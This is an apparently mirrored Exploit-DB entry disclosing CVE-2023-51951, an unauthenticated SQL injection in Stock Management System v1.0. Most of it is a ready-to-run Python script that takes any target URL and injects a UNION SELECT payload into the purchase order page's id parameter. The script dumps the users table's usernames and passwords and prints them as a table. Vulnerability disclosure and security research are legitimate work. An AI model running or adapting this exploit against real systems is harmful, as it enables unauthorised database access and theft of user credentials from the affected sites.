Stock Management System v1.0 – Unauthenticated SQL Injection

  • 作者: blu3ming
    日期: 2024-04-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51990/
  • # Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
    # Date: February 6, 2024
    # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
    # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
    # Tested on: Linux and Windows, XAMPP
    # CVE-2023-51951
    # Vendor: oretnom23
    # Version: v1.0
    # Exploit Description:
    # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
    
    import requests
    from bs4 import BeautifulSoup
    import argparse
    
    def print_header():
    print("\033[1m\nStock Management System v1.0\033[0m")
    print("\033[1mSQL Injection Exploit\033[0m")
    print("\033[96mby blu3ming\n\033[0m")
    
    def parse_response(target_url):
    try:
    target_response = requests.get(target_url)
    soup = BeautifulSoup(target_response.text, 'html.parser')
    textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
    
    # Split the text using ',' as a delimiter
    users = textarea_text.split(',')
    for user in users:
    # Split username and password using ':' as a delimiter
    username, password = user.split(':')
    print("| {:<20} | {:<40} |".format(username, password))
    except:
    print("No data could be retrieved. Try again.")
    
    def retrieve_data(base_url):
    target_path = '/sms/admin/?page=purchase_order/manage_po&id='
    payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
    
    #Dump users table
    target_url = base_url + target_path + payload
    print("+----------------------+------------------------------------------+")
    print("| {:<20} | {:<40} |".format("username", "password"))
    print("+----------------------+------------------------------------------+")
    parse_response(target_url)
    print("+----------------------+------------------------------------------+\n")
    
    if __name__ == "__main__":
    about= 'Unauthenticated SQL Injection Exploit - Stock Management System'
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
    args = parser.parse_args()
    print_header()
    retrieve_data(args.base_url)